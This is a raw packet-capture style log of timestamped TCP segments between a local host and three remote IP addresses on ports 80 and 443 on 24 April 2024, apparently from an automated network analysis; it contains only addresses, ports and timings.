                                                                                                                                      Apr 24, 2024 14:42:13.255844116 CEST4970280192.168.2.7211.181.24.132
                                                                                                                                      Apr 24, 2024 14:42:13.255873919 CEST8049702211.181.24.132192.168.2.7
                                                                                                                                      Apr 24, 2024 14:42:13.255917072 CEST4970280192.168.2.7211.181.24.132
                                                                                                                                      Apr 24, 2024 14:42:13.255933046 CEST8049702211.181.24.132192.168.2.7
                                                                                                                                      Apr 24, 2024 14:42:13.255950928 CEST8049702211.181.24.132192.168.2.7
                                                                                                                                      Apr 24, 2024 14:42:13.255975008 CEST4970280192.168.2.7211.181.24.132
                                                                                                                                      Apr 24, 2024 14:42:13.255995989 CEST4970280192.168.2.7211.181.24.132
                                                                                                                                      Apr 24, 2024 14:42:13.256032944 CEST8049702211.181.24.132192.168.2.7
                                                                                                                                      Apr 24, 2024 14:42:13.256175995 CEST8049702211.181.24.132192.168.2.7
                                                                                                                                      Apr 24, 2024 14:42:13.256221056 CEST4970280192.168.2.7211.181.24.132
                                                                                                                                      Apr 24, 2024 14:42:13.256251097 CEST8049702211.181.24.132192.168.2.7
                                                                                                                                      Apr 24, 2024 14:42:13.256285906 CEST8049702211.181.24.132192.168.2.7
                                                                                                                                      Apr 24, 2024 14:42:13.256294966 CEST4970280192.168.2.7211.181.24.132
                                                                                                                                      Apr 24, 2024 14:42:13.256330013 CEST4970280192.168.2.7211.181.24.132
                                                                                                                                      Apr 24, 2024 14:42:13.256346941 CEST8049702211.181.24.132192.168.2.7
                                                                                                                                      Apr 24, 2024 14:42:13.256390095 CEST4970280192.168.2.7211.181.24.132
                                                                                                                                      Apr 24, 2024 14:42:13.256424904 CEST8049702211.181.24.132192.168.2.7
                                                                                                                                      Apr 24, 2024 14:42:13.256458998 CEST8049702211.181.24.132192.168.2.7
                                                                                                                                      Apr 24, 2024 14:42:13.256465912 CEST4970280192.168.2.7211.181.24.132
                                                                                                                                      Apr 24, 2024 14:42:13.256500959 CEST4970280192.168.2.7211.181.24.132
                                                                                                                                      Apr 24, 2024 14:42:13.256503105 CEST8049702211.181.24.132192.168.2.7
                                                                                                                                      Apr 24, 2024 14:42:13.256541967 CEST4970280192.168.2.7211.181.24.132
                                                                                                                                      Apr 24, 2024 14:42:13.256587029 CEST8049702211.181.24.132192.168.2.7
                                                                                                                                      Apr 24, 2024 14:42:13.256630898 CEST4970280192.168.2.7211.181.24.132
                                                                                                                                      Apr 24, 2024 14:42:13.256731987 CEST8049702211.181.24.132192.168.2.7
                                                                                                                                      Apr 24, 2024 14:42:13.256751060 CEST8049702211.181.24.132192.168.2.7
                                                                                                                                      Apr 24, 2024 14:42:13.256776094 CEST4970280192.168.2.7211.181.24.132
                                                                                                                                      Apr 24, 2024 14:42:13.256792068 CEST4970280192.168.2.7211.181.24.132
                                                                                                                                      Apr 24, 2024 14:42:13.256807089 CEST8049702211.181.24.132192.168.2.7
                                                                                                                                      Apr 24, 2024 14:42:13.256849051 CEST4970280192.168.2.7211.181.24.132
                                                                                                                                      Apr 24, 2024 14:42:13.256870031 CEST8049702211.181.24.132192.168.2.7
                                                                                                                                      Apr 24, 2024 14:42:13.256902933 CEST8049702211.181.24.132192.168.2.7
                                                                                                                                      Apr 24, 2024 14:42:13.256911993 CEST4970280192.168.2.7211.181.24.132
                                                                                                                                      Apr 24, 2024 14:42:13.256942987 CEST4970280192.168.2.7211.181.24.132
                                                                                                                                      Apr 24, 2024 14:42:13.256975889 CEST8049702211.181.24.132192.168.2.7
                                                                                                                                      Apr 24, 2024 14:42:13.257019043 CEST4970280192.168.2.7211.181.24.132
                                                                                                                                      Apr 24, 2024 14:42:13.257047892 CEST8049702211.181.24.132192.168.2.7
                                                                                                                                      Apr 24, 2024 14:42:13.257091045 CEST4970280192.168.2.7211.181.24.132
                                                                                                                                      Apr 24, 2024 14:42:13.257124901 CEST8049702211.181.24.132192.168.2.7
                                                                                                                                      Apr 24, 2024 14:42:13.257165909 CEST4970280192.168.2.7211.181.24.132
                                                                                                                                      Apr 24, 2024 14:42:13.257205009 CEST8049702211.181.24.132192.168.2.7
                                                                                                                                      Apr 24, 2024 14:42:13.257246971 CEST4970280192.168.2.7211.181.24.132
                                                                                                                                      Apr 24, 2024 14:42:13.257276058 CEST8049702211.181.24.132192.168.2.7
                                                                                                                                      Apr 24, 2024 14:42:13.257293940 CEST8049702211.181.24.132192.168.2.7
                                                                                                                                      Apr 24, 2024 14:42:13.257319927 CEST4970280192.168.2.7211.181.24.132
                                                                                                                                      Apr 24, 2024 14:42:13.257339954 CEST4970280192.168.2.7211.181.24.132
                                                                                                                                      Apr 24, 2024 14:42:13.257359028 CEST8049702211.181.24.132192.168.2.7
                                                                                                                                      Apr 24, 2024 14:42:13.257438898 CEST8049702211.181.24.132192.168.2.7
                                                                                                                                      Apr 24, 2024 14:42:13.257456064 CEST8049702211.181.24.132192.168.2.7
                                                                                                                                      Apr 24, 2024 14:42:13.257483006 CEST4970280192.168.2.7211.181.24.132
                                                                                                                                      Apr 24, 2024 14:42:13.257514000 CEST4970280192.168.2.7211.181.24.132
                                                                                                                                      Apr 24, 2024 14:42:13.257535934 CEST8049702211.181.24.132192.168.2.7
                                                                                                                                      Apr 24, 2024 14:42:13.257553101 CEST8049702211.181.24.132192.168.2.7
                                                                                                                                      Apr 24, 2024 14:42:13.257596970 CEST4970280192.168.2.7211.181.24.132
                                                                                                                                      Apr 24, 2024 14:42:13.257607937 CEST8049702211.181.24.132192.168.2.7
                                                                                                                                      Apr 24, 2024 14:42:13.257643938 CEST8049702211.181.24.132192.168.2.7
                                                                                                                                      Apr 24, 2024 14:42:13.257652998 CEST4970280192.168.2.7211.181.24.132
                                                                                                                                      Apr 24, 2024 14:42:13.257688046 CEST4970280192.168.2.7211.181.24.132
                                                                                                                                      Apr 24, 2024 14:42:13.257740021 CEST8049702211.181.24.132192.168.2.7
                                                                                                                                      Apr 24, 2024 14:42:13.257783890 CEST4970280192.168.2.7211.181.24.132
                                                                                                                                      Apr 24, 2024 14:42:13.257939100 CEST8049702211.181.24.132192.168.2.7
                                                                                                                                      Apr 24, 2024 14:42:13.257982969 CEST4970280192.168.2.7211.181.24.132
                                                                                                                                      Apr 24, 2024 14:42:13.257992983 CEST8049702211.181.24.132192.168.2.7
                                                                                                                                      Apr 24, 2024 14:42:13.258034945 CEST8049702211.181.24.132192.168.2.7
                                                                                                                                      Apr 24, 2024 14:42:13.258044958 CEST4970280192.168.2.7211.181.24.132
                                                                                                                                      Apr 24, 2024 14:42:13.258076906 CEST4970280192.168.2.7211.181.24.132
                                                                                                                                      Apr 24, 2024 14:42:13.258085012 CEST8049702211.181.24.132192.168.2.7
                                                                                                                                      Apr 24, 2024 14:42:13.258130074 CEST4970280192.168.2.7211.181.24.132
                                                                                                                                      Apr 24, 2024 14:42:13.258138895 CEST8049702211.181.24.132192.168.2.7
                                                                                                                                      Apr 24, 2024 14:42:13.258182049 CEST4970280192.168.2.7211.181.24.132
                                                                                                                                      Apr 24, 2024 14:42:13.258280993 CEST8049702211.181.24.132192.168.2.7
                                                                                                                                      Apr 24, 2024 14:42:13.258325100 CEST4970280192.168.2.7211.181.24.132
                                                                                                                                      Apr 24, 2024 14:42:13.258347988 CEST8049702211.181.24.132192.168.2.7
                                                                                                                                      Apr 24, 2024 14:42:13.258390903 CEST4970280192.168.2.7211.181.24.132
                                                                                                                                      Apr 24, 2024 14:42:13.258462906 CEST8049702211.181.24.132192.168.2.7
                                                                                                                                      Apr 24, 2024 14:42:13.258506060 CEST4970280192.168.2.7211.181.24.132
                                                                                                                                      Apr 24, 2024 14:42:13.258512020 CEST8049702211.181.24.132192.168.2.7
                                                                                                                                      Apr 24, 2024 14:42:13.258552074 CEST8049702211.181.24.132192.168.2.7
                                                                                                                                      Apr 24, 2024 14:42:13.258554935 CEST4970280192.168.2.7211.181.24.132
                                                                                                                                      Apr 24, 2024 14:42:13.258593082 CEST4970280192.168.2.7211.181.24.132
                                                                                                                                      Apr 24, 2024 14:42:13.258738041 CEST8049702211.181.24.132192.168.2.7
                                                                                                                                      Apr 24, 2024 14:42:13.258755922 CEST8049702211.181.24.132192.168.2.7
                                                                                                                                      Apr 24, 2024 14:42:13.258784056 CEST4970280192.168.2.7211.181.24.132
                                                                                                                                      Apr 24, 2024 14:42:13.258809090 CEST4970280192.168.2.7211.181.24.132
                                                                                                                                      Apr 24, 2024 14:42:13.258821011 CEST8049702211.181.24.132192.168.2.7
                                                                                                                                      Apr 24, 2024 14:42:13.258909941 CEST8049702211.181.24.132192.168.2.7
                                                                                                                                      Apr 24, 2024 14:42:13.258953094 CEST4970280192.168.2.7211.181.24.132
                                                                                                                                      Apr 24, 2024 14:42:13.258980036 CEST8049702211.181.24.132192.168.2.7
                                                                                                                                      Apr 24, 2024 14:42:13.259023905 CEST4970280192.168.2.7211.181.24.132
                                                                                                                                      Apr 24, 2024 14:42:13.259037018 CEST8049702211.181.24.132192.168.2.7
                                                                                                                                      Apr 24, 2024 14:42:13.259079933 CEST4970280192.168.2.7211.181.24.132
                                                                                                                                      Apr 24, 2024 14:42:13.259335041 CEST8049702211.181.24.132192.168.2.7
                                                                                                                                      Apr 24, 2024 14:42:13.259380102 CEST4970280192.168.2.7211.181.24.132
                                                                                                                                      Apr 24, 2024 14:42:13.259720087 CEST8049702211.181.24.132192.168.2.7
                                                                                                                                      Apr 24, 2024 14:42:13.259963036 CEST8049702211.181.24.132192.168.2.7
                                                                                                                                      Apr 24, 2024 14:42:13.260018110 CEST4970280192.168.2.7211.181.24.132
                                                                                                                                      Apr 24, 2024 14:42:13.260123014 CEST8049702211.181.24.132192.168.2.7
                                                                                                                                      Apr 24, 2024 14:42:13.260157108 CEST8049702211.181.24.132192.168.2.7
                                                                                                                                      Apr 24, 2024 14:42:13.260169029 CEST4970280192.168.2.7211.181.24.132
                                                                                                                                      Apr 24, 2024 14:42:13.260200024 CEST4970280192.168.2.7211.181.24.132
                                                                                                                                      Apr 24, 2024 14:42:13.260243893 CEST8049702211.181.24.132192.168.2.7
                                                                                                                                      Apr 24, 2024 14:42:13.260284901 CEST8049702211.181.24.132192.168.2.7
                                                                                                                                      Apr 24, 2024 14:42:13.260287046 CEST4970280192.168.2.7211.181.24.132
                                                                                                                                      Apr 24, 2024 14:42:13.260303974 CEST8049702211.181.24.132192.168.2.7
                                                                                                                                      Apr 24, 2024 14:42:13.260328054 CEST4970280192.168.2.7211.181.24.132
                                                                                                                                      Apr 24, 2024 14:42:13.260344982 CEST4970280192.168.2.7211.181.24.132
                                                                                                                                      Apr 24, 2024 14:42:13.337982893 CEST8049702211.181.24.132192.168.2.7
                                                                                                                                      Apr 24, 2024 14:42:13.338023901 CEST8049702211.181.24.132192.168.2.7
                                                                                                                                      Apr 24, 2024 14:42:13.338041067 CEST8049702211.181.24.132192.168.2.7
                                                                                                                                      Apr 24, 2024 14:42:13.338057041 CEST8049702211.181.24.132192.168.2.7
                                                                                                                                      Apr 24, 2024 14:42:13.338076115 CEST8049702211.181.24.132192.168.2.7
                                                                                                                                      Apr 24, 2024 14:42:13.338082075 CEST4970280192.168.2.7211.181.24.132
                                                                                                                                      Apr 24, 2024 14:42:13.338092089 CEST8049702211.181.24.132192.168.2.7
                                                                                                                                      Apr 24, 2024 14:42:13.338125944 CEST4970280192.168.2.7211.181.24.132
                                                                                                                                      Apr 24, 2024 14:42:13.338143110 CEST4970280192.168.2.7211.181.24.132
                                                                                                                                      Apr 24, 2024 14:42:13.338498116 CEST8049702211.181.24.132192.168.2.7
                                                                                                                                      Apr 24, 2024 14:42:13.338538885 CEST8049702211.181.24.132192.168.2.7
                                                                                                                                      Apr 24, 2024 14:42:13.338555098 CEST8049702211.181.24.132192.168.2.7
                                                                                                                                      Apr 24, 2024 14:42:13.338582993 CEST4970280192.168.2.7211.181.24.132
                                                                                                                                      Apr 24, 2024 14:42:13.338594913 CEST8049702211.181.24.132192.168.2.7
                                                                                                                                      Apr 24, 2024 14:42:13.338609934 CEST4970280192.168.2.7211.181.24.132
                                                                                                                                      Apr 24, 2024 14:42:13.338612080 CEST8049702211.181.24.132192.168.2.7
                                                                                                                                      Apr 24, 2024 14:42:13.338630915 CEST8049702211.181.24.132192.168.2.7
                                                                                                                                      Apr 24, 2024 14:42:13.338638067 CEST4970280192.168.2.7211.181.24.132
                                                                                                                                      Apr 24, 2024 14:42:13.338653088 CEST4970280192.168.2.7211.181.24.132
                                                                                                                                      Apr 24, 2024 14:42:13.338721991 CEST4970280192.168.2.7211.181.24.132
                                                                                                                                      Apr 24, 2024 14:42:13.344022036 CEST4970280192.168.2.7211.181.24.132
                                                                                                                                      Apr 24, 2024 14:42:13.641475916 CEST8049702211.181.24.132192.168.2.7
                                                                                                                                      Apr 24, 2024 14:42:13.866916895 CEST4970580192.168.2.7189.232.19.193
                                                                                                                                      Apr 24, 2024 14:42:14.071058035 CEST8049705189.232.19.193192.168.2.7
                                                                                                                                      Apr 24, 2024 14:42:14.071124077 CEST4970580192.168.2.7189.232.19.193
                                                                                                                                      Apr 24, 2024 14:42:14.071400881 CEST4970580192.168.2.7189.232.19.193
                                                                                                                                      Apr 24, 2024 14:42:14.322081089 CEST8049705189.232.19.193192.168.2.7
                                                                                                                                      Apr 24, 2024 14:42:14.350450993 CEST49706443192.168.2.723.65.44.84
                                                                                                                                      Apr 24, 2024 14:42:14.350536108 CEST4434970623.65.44.84192.168.2.7
                                                                                                                                      Apr 24, 2024 14:42:14.350611925 CEST49706443192.168.2.723.65.44.84
                                                                                                                                      Apr 24, 2024 14:42:14.361746073 CEST49706443192.168.2.723.65.44.84
                                                                                                                                      Apr 24, 2024 14:42:14.361782074 CEST4434970623.65.44.84192.168.2.7
                                                                                                                                      Apr 24, 2024 14:42:14.698991060 CEST4434970623.65.44.84192.168.2.7
                                                                                                                                      Apr 24, 2024 14:42:14.699109077 CEST49706443192.168.2.723.65.44.84
                                                                                                                                      Apr 24, 2024 14:42:14.776309013 CEST49706443192.168.2.723.65.44.84
                                                                                                                                      Apr 24, 2024 14:42:14.776345968 CEST4434970623.65.44.84192.168.2.7
                                                                                                                                      Apr 24, 2024 14:42:14.776684999 CEST4434970623.65.44.84192.168.2.7
                                                                                                                                      Apr 24, 2024 14:42:14.777529955 CEST49706443192.168.2.723.65.44.84
                                                                                                                                      Apr 24, 2024 14:42:14.782756090 CEST49706443192.168.2.723.65.44.84
                                                                                                                                      Apr 24, 2024 14:42:14.818780899 CEST8049705189.232.19.193192.168.2.7
                                                                                                                                      Apr 24, 2024 14:42:14.818842888 CEST8049705189.232.19.193192.168.2.7
                                                                                                                                      Apr 24, 2024 14:42:14.818849087 CEST4970580192.168.2.7189.232.19.193
                                                                                                                                      Apr 24, 2024 14:42:14.818881989 CEST4970580192.168.2.7189.232.19.193
                                                                                                                                      Apr 24, 2024 14:42:14.818941116 CEST8049705189.232.19.193192.168.2.7
                                                                                                                                      Apr 24, 2024 14:42:14.818994999 CEST4970580192.168.2.7189.232.19.193
                                                                                                                                      Apr 24, 2024 14:42:14.819032907 CEST8049705189.232.19.193192.168.2.7
                                                                                                                                      Apr 24, 2024 14:42:14.819072962 CEST4970580192.168.2.7189.232.19.193
                                                                                                                                      Apr 24, 2024 14:42:14.824130058 CEST4434970623.65.44.84192.168.2.7
                                                                                                                                      Apr 24, 2024 14:42:15.020574093 CEST8049705189.232.19.193192.168.2.7
                                                                                                                                      Apr 24, 2024 14:42:15.020653963 CEST4970580192.168.2.7189.232.19.193
                                                                                                                                      Apr 24, 2024 14:42:15.020700932 CEST8049705189.232.19.193192.168.2.7
                                                                                                                                      Apr 24, 2024 14:42:15.020714998 CEST8049705189.232.19.193192.168.2.7
                                                                                                                                      Apr 24, 2024 14:42:15.020756006 CEST4970580192.168.2.7189.232.19.193
                                                                                                                                      Apr 24, 2024 14:42:15.020768881 CEST8049705189.232.19.193192.168.2.7
                                                                                                                                      Apr 24, 2024 14:42:15.020812988 CEST8049705189.232.19.193192.168.2.7
                                                                                                                                      Apr 24, 2024 14:42:15.020833969 CEST4970580192.168.2.7189.232.19.193
                                                                                                                                      Apr 24, 2024 14:42:15.020867109 CEST8049705189.232.19.193192.168.2.7
                                                                                                                                      Apr 24, 2024 14:42:15.020869970 CEST4970580192.168.2.7189.232.19.193
                                                                                                                                      Apr 24, 2024 14:42:15.020905018 CEST4970580192.168.2.7189.232.19.193
                                                                                                                                      Apr 24, 2024 14:42:15.020915031 CEST8049705189.232.19.193192.168.2.7
                                                                                                                                      Apr 24, 2024 14:42:15.020941019 CEST8049705189.232.19.193192.168.2.7
                                                                                                                                      Apr 24, 2024 14:42:15.020984888 CEST4970580192.168.2.7189.232.19.193
                                                                                                                                      Apr 24, 2024 14:42:15.216793060 CEST4434970623.65.44.84192.168.2.7
                                                                                                                                      Apr 24, 2024 14:42:15.216819048 CEST4434970623.65.44.84192.168.2.7
                                                                                                                                      Apr 24, 2024 14:42:15.216881990 CEST4434970623.65.44.84192.168.2.7
                                                                                                                                      Apr 24, 2024 14:42:15.216907978 CEST49706443192.168.2.723.65.44.84
                                                                                                                                      Apr 24, 2024 14:42:15.216931105 CEST4434970623.65.44.84192.168.2.7
                                                                                                                                      Apr 24, 2024 14:42:15.216962099 CEST49706443192.168.2.723.65.44.84
                                                                                                                                      Apr 24, 2024 14:42:15.216962099 CEST49706443192.168.2.723.65.44.84
                                                                                                                                      Apr 24, 2024 14:42:15.216984034 CEST49706443192.168.2.723.65.44.84
                                                                                                                                      Apr 24, 2024 14:42:15.221992016 CEST8049705189.232.19.193192.168.2.7
                                                                                                                                      Apr 24, 2024 14:42:15.222055912 CEST4970580192.168.2.7189.232.19.193
                                                                                                                                      Apr 24, 2024 14:42:15.222059011 CEST8049705189.232.19.193192.168.2.7
                                                                                                                                      Apr 24, 2024 14:42:15.222099066 CEST8049705189.232.19.193192.168.2.7
                                                                                                                                      Apr 24, 2024 14:42:15.222117901 CEST4970580192.168.2.7189.232.19.193
                                                                                                                                      Apr 24, 2024 14:42:15.222138882 CEST8049705189.232.19.193192.168.2.7
                                                                                                                                      Apr 24, 2024 14:42:15.222143888 CEST4970580192.168.2.7189.232.19.193
                                                                                                                                      Apr 24, 2024 14:42:15.222176075 CEST8049705189.232.19.193192.168.2.7
                                                                                                                                      Apr 24, 2024 14:42:15.222196102 CEST4970580192.168.2.7189.232.19.193
                                                                                                                                      Apr 24, 2024 14:42:15.222214937 CEST8049705189.232.19.193192.168.2.7
                                                                                                                                      Apr 24, 2024 14:42:15.222220898 CEST4970580192.168.2.7189.232.19.193
                                                                                                                                      Apr 24, 2024 14:42:15.222251892 CEST8049705189.232.19.193192.168.2.7
                                                                                                                                      Apr 24, 2024 14:42:15.222289085 CEST8049705189.232.19.193192.168.2.7
                                                                                                                                      Apr 24, 2024 14:42:15.222297907 CEST4970580192.168.2.7189.232.19.193
                                                                                                                                      Apr 24, 2024 14:42:15.222326040 CEST8049705189.232.19.193192.168.2.7
                                                                                                                                      Apr 24, 2024 14:42:15.222351074 CEST4970580192.168.2.7189.232.19.193
                                                                                                                                      Apr 24, 2024 14:42:15.222362995 CEST8049705189.232.19.193192.168.2.7
                                                                                                                                      Apr 24, 2024 14:42:15.222399950 CEST8049705189.232.19.193192.168.2.7
                                                                                                                                      Apr 24, 2024 14:42:15.222425938 CEST4970580192.168.2.7189.232.19.193
                                                                                                                                      Apr 24, 2024 14:42:15.222448111 CEST4970580192.168.2.7189.232.19.193
                                                                                                                                      Apr 24, 2024 14:42:15.227045059 CEST8049705189.232.19.193192.168.2.7
                                                                                                                                      Apr 24, 2024 14:42:15.227113008 CEST4970580192.168.2.7189.232.19.193
                                                                                                                                      Apr 24, 2024 14:42:15.227150917 CEST8049705189.232.19.193192.168.2.7
                                                                                                                                      Apr 24, 2024 14:42:15.227224112 CEST8049705189.232.19.193192.168.2.7
                                                                                                                                      Apr 24, 2024 14:42:15.227260113 CEST4970580192.168.2.7189.232.19.193
                                                                                                                                      Apr 24, 2024 14:42:15.227319956 CEST4970580192.168.2.7189.232.19.193
                                                                                                                                      Apr 24, 2024 14:42:15.227324009 CEST8049705189.232.19.193192.168.2.7
                                                                                                                                      Apr 24, 2024 14:42:15.227363110 CEST8049705189.232.19.193192.168.2.7
                                                                                                                                      Apr 24, 2024 14:42:15.227454901 CEST4970580192.168.2.7189.232.19.193
                                                                                                                                      Apr 24, 2024 14:42:15.373181105 CEST4434970623.65.44.84192.168.2.7
                                                                                                                                      Apr 24, 2024 14:42:15.373272896 CEST4434970623.65.44.84192.168.2.7
                                                                                                                                      Apr 24, 2024 14:42:15.373294115 CEST49706443192.168.2.723.65.44.84
                                                                                                                                      Apr 24, 2024 14:42:15.373315096 CEST4434970623.65.44.84192.168.2.7
                                                                                                                                      Apr 24, 2024 14:42:15.373343945 CEST49706443192.168.2.723.65.44.84
                                                                                                                                      Apr 24, 2024 14:42:15.373361111 CEST49706443192.168.2.723.65.44.84
                                                                                                                                      Apr 24, 2024 14:42:15.401452065 CEST4434970623.65.44.84192.168.2.7
                                                                                                                                      Apr 24, 2024 14:42:15.401535034 CEST4434970623.65.44.84192.168.2.7
                                                                                                                                      Apr 24, 2024 14:42:15.401566982 CEST49706443192.168.2.723.65.44.84
                                                                                                                                      Apr 24, 2024 14:42:15.401602030 CEST49706443192.168.2.723.65.44.84
                                                                                                                                      Apr 24, 2024 14:42:15.405150890 CEST49706443192.168.2.723.65.44.84
                                                                                                                                      Apr 24, 2024 14:42:15.405191898 CEST4434970623.65.44.84192.168.2.7
                                                                                                                                      Apr 24, 2024 14:42:15.426183939 CEST8049705189.232.19.193192.168.2.7
                                                                                                                                      Apr 24, 2024 14:42:15.426265001 CEST8049705189.232.19.193192.168.2.7
                                                                                                                                      Apr 24, 2024 14:42:15.426314116 CEST4970580192.168.2.7189.232.19.193
                                                                                                                                      Apr 24, 2024 14:42:15.426314116 CEST4970580192.168.2.7189.232.19.193
                                                                                                                                      Apr 24, 2024 14:42:15.426320076 CEST8049705189.232.19.193192.168.2.7
                                                                                                                                      Apr 24, 2024 14:42:15.426358938 CEST8049705189.232.19.193192.168.2.7
                                                                                                                                      Apr 24, 2024 14:42:15.426433086 CEST4970580192.168.2.7189.232.19.193
                                                                                                                                      Apr 24, 2024 14:42:15.426465988 CEST8049705189.232.19.193192.168.2.7
                                                                                                                                      Apr 24, 2024 14:42:15.426536083 CEST8049705189.232.19.193192.168.2.7
                                                                                                                                      Apr 24, 2024 14:42:15.426600933 CEST4970580192.168.2.7189.232.19.193
                                                                                                                                      Apr 24, 2024 14:42:15.426634073 CEST8049705189.232.19.193192.168.2.7
                                                                                                                                      Apr 24, 2024 14:42:15.426712036 CEST4970580192.168.2.7189.232.19.193
                                                                                                                                      Apr 24, 2024 14:42:15.426762104 CEST8049705189.232.19.193192.168.2.7
                                                                                                                                      Apr 24, 2024 14:42:15.426832914 CEST8049705189.232.19.193192.168.2.7
                                                                                                                                      Apr 24, 2024 14:42:15.426870108 CEST8049705189.232.19.193192.168.2.7
                                                                                                                                      Apr 24, 2024 14:42:15.426906109 CEST4970580192.168.2.7189.232.19.193
                                                                                                                                      Apr 24, 2024 14:42:15.427187920 CEST4970580192.168.2.7189.232.19.193
                                                                                                                                      Apr 24, 2024 14:42:15.427236080 CEST8049705189.232.19.193192.168.2.7
                                                                                                                                      Apr 24, 2024 14:42:15.427305937 CEST8049705189.232.19.193192.168.2.7
                                                                                                                                      Apr 24, 2024 14:42:15.427316904 CEST4970580192.168.2.7189.232.19.193
                                                                                                                                      Apr 24, 2024 14:42:15.427623034 CEST4970580192.168.2.7189.232.19.193
                                                                                                                                      Apr 24, 2024 14:42:15.431071043 CEST8049705189.232.19.193192.168.2.7
                                                                                                                                      Apr 24, 2024 14:42:15.431143045 CEST4970580192.168.2.7189.232.19.193
                                                                                                                                      Apr 24, 2024 14:42:15.431158066 CEST8049705189.232.19.193192.168.2.7
                                                                                                                                      Apr 24, 2024 14:42:15.431207895 CEST4970580192.168.2.7189.232.19.193
                                                                                                                                      Apr 24, 2024 14:42:15.431273937 CEST8049705189.232.19.193192.168.2.7
                                                                                                                                      Apr 24, 2024 14:42:15.431327105 CEST4970580192.168.2.7189.232.19.193
                                                                                                                                      Apr 24, 2024 14:42:15.431349993 CEST8049705189.232.19.193192.168.2.7
                                                                                                                                      Apr 24, 2024 14:42:15.431396008 CEST4970580192.168.2.7189.232.19.193
                                                                                                                                      Apr 24, 2024 14:42:15.431421041 CEST8049705189.232.19.193192.168.2.7
                                                                                                                                      Apr 24, 2024 14:42:15.431529045 CEST8049705189.232.19.193192.168.2.7
                                                                                                                                      Apr 24, 2024 14:42:15.431529999 CEST4970580192.168.2.7189.232.19.193
                                                                                                                                      Apr 24, 2024 14:42:15.431582928 CEST8049705189.232.19.193192.168.2.7
                                                                                                                                      Apr 24, 2024 14:42:15.431631088 CEST4970580192.168.2.7189.232.19.193
                                                                                                                                      Apr 24, 2024 14:42:15.431654930 CEST8049705189.232.19.193192.168.2.7
                                                                                                                                      Apr 24, 2024 14:42:15.431757927 CEST8049705189.232.19.193192.168.2.7
                                                                                                                                      Apr 24, 2024 14:42:15.431821108 CEST8049705189.232.19.193192.168.2.7
                                                                                                                                      Apr 24, 2024 14:42:15.431910038 CEST8049705189.232.19.193192.168.2.7
                                                                                                                                      Apr 24, 2024 14:42:15.432075024 CEST4970580192.168.2.7189.232.19.193
                                                                                                                                      Apr 24, 2024 14:42:15.432147026 CEST8049705189.232.19.193192.168.2.7
                                                                                                                                      Apr 24, 2024 14:42:15.432213068 CEST8049705189.232.19.193192.168.2.7
                                                                                                                                      Apr 24, 2024 14:42:15.432235956 CEST4970580192.168.2.7189.232.19.193
                                                                                                                                      Apr 24, 2024 14:42:15.435976982 CEST8049705189.232.19.193192.168.2.7
                                                                                                                                      Apr 24, 2024 14:42:15.436034918 CEST4970580192.168.2.7189.232.19.193
                                                                                                                                      Apr 24, 2024 14:42:15.436044931 CEST8049705189.232.19.193192.168.2.7
                                                                                                                                      Apr 24, 2024 14:42:15.436229944 CEST8049705189.232.19.193192.168.2.7
                                                                                                                                      Apr 24, 2024 14:42:15.436286926 CEST4970580192.168.2.7189.232.19.193
                                                                                                                                      Apr 24, 2024 14:42:15.436336994 CEST8049705189.232.19.193192.168.2.7
                                                                                                                                      Apr 24, 2024 14:42:15.436388016 CEST8049705189.232.19.193192.168.2.7
                                                                                                                                      Apr 24, 2024 14:42:15.436403036 CEST4970580192.168.2.7189.232.19.193
                                                                                                                                      Apr 24, 2024 14:42:15.436472893 CEST8049705189.232.19.193192.168.2.7
                                                                                                                                      Apr 24, 2024 14:42:15.436543941 CEST8049705189.232.19.193192.168.2.7
                                                                                                                                      Apr 24, 2024 14:42:15.436592102 CEST4970580192.168.2.7189.232.19.193
                                                                                                                                      Apr 24, 2024 14:42:15.437273979 CEST4970580192.168.2.7189.232.19.193
                                                                                                                                      Apr 24, 2024 14:42:15.627748966 CEST8049705189.232.19.193192.168.2.7
                                                                                                                                      Apr 24, 2024 14:42:15.627825022 CEST8049705189.232.19.193192.168.2.7
                                                                                                                                      Apr 24, 2024 14:42:15.627876043 CEST4970580192.168.2.7189.232.19.193
                                                                                                                                      Apr 24, 2024 14:42:15.627909899 CEST8049705189.232.19.193192.168.2.7
                                                                                                                                      Apr 24, 2024 14:42:15.627964973 CEST8049705189.232.19.193192.168.2.7
                                                                                                                                      Apr 24, 2024 14:42:15.628046036 CEST8049705189.232.19.193192.168.2.7
                                                                                                                                      Apr 24, 2024 14:42:15.628046989 CEST4970580192.168.2.7189.232.19.193
                                                                                                                                      Apr 24, 2024 14:42:15.628118038 CEST8049705189.232.19.193192.168.2.7
                                                                                                                                      Apr 24, 2024 14:42:15.628125906 CEST4970580192.168.2.7189.232.19.193
                                                                                                                                      Apr 24, 2024 14:42:15.628166914 CEST8049705189.232.19.193192.168.2.7
                                                                                                                                      Apr 24, 2024 14:42:15.628209114 CEST8049705189.232.19.193192.168.2.7
                                                                                                                                      Apr 24, 2024 14:42:15.628227949 CEST4970580192.168.2.7189.232.19.193
                                                                                                                                      Apr 24, 2024 14:42:15.631779909 CEST4970580192.168.2.7189.232.19.193
                                                                                                                                      Apr 24, 2024 14:42:15.632220030 CEST8049705189.232.19.193192.168.2.7
                                                                                                                                      Apr 24, 2024 14:42:15.632236004 CEST8049705189.232.19.193192.168.2.7
                                                                                                                                      Apr 24, 2024 14:42:15.632282972 CEST4970580192.168.2.7189.232.19.193
                                                                                                                                      Apr 24, 2024 14:42:15.632303953 CEST8049705189.232.19.193192.168.2.7
                                                                                                                                      Apr 24, 2024 14:42:15.632455111 CEST8049705189.232.19.193192.168.2.7
                                                                                                                                      Apr 24, 2024 14:42:15.632523060 CEST8049705189.232.19.193192.168.2.7
                                                                                                                                      Apr 24, 2024 14:42:15.632560015 CEST4970580192.168.2.7189.232.19.193
                                                                                                                                      Apr 24, 2024 14:42:15.632560015 CEST4970580192.168.2.7189.232.19.193
                                                                                                                                      Apr 24, 2024 14:42:15.632586956 CEST8049705189.232.19.193192.168.2.7
                                                                                                                                      Apr 24, 2024 14:42:15.632654905 CEST8049705189.232.19.193192.168.2.7
                                                                                                                                      Apr 24, 2024 14:42:15.632714033 CEST4970580192.168.2.7189.232.19.193
                                                                                                                                      Apr 24, 2024 14:42:15.632724047 CEST8049705189.232.19.193192.168.2.7
                                                                                                                                      Apr 24, 2024 14:42:15.632781029 CEST8049705189.232.19.193192.168.2.7
                                                                                                                                      Apr 24, 2024 14:42:15.632795095 CEST8049705189.232.19.193192.168.2.7
                                                                                                                                      Apr 24, 2024 14:42:15.632826090 CEST4970580192.168.2.7189.232.19.193
                                                                                                                                      Apr 24, 2024 14:42:15.632873058 CEST8049705189.232.19.193192.168.2.7
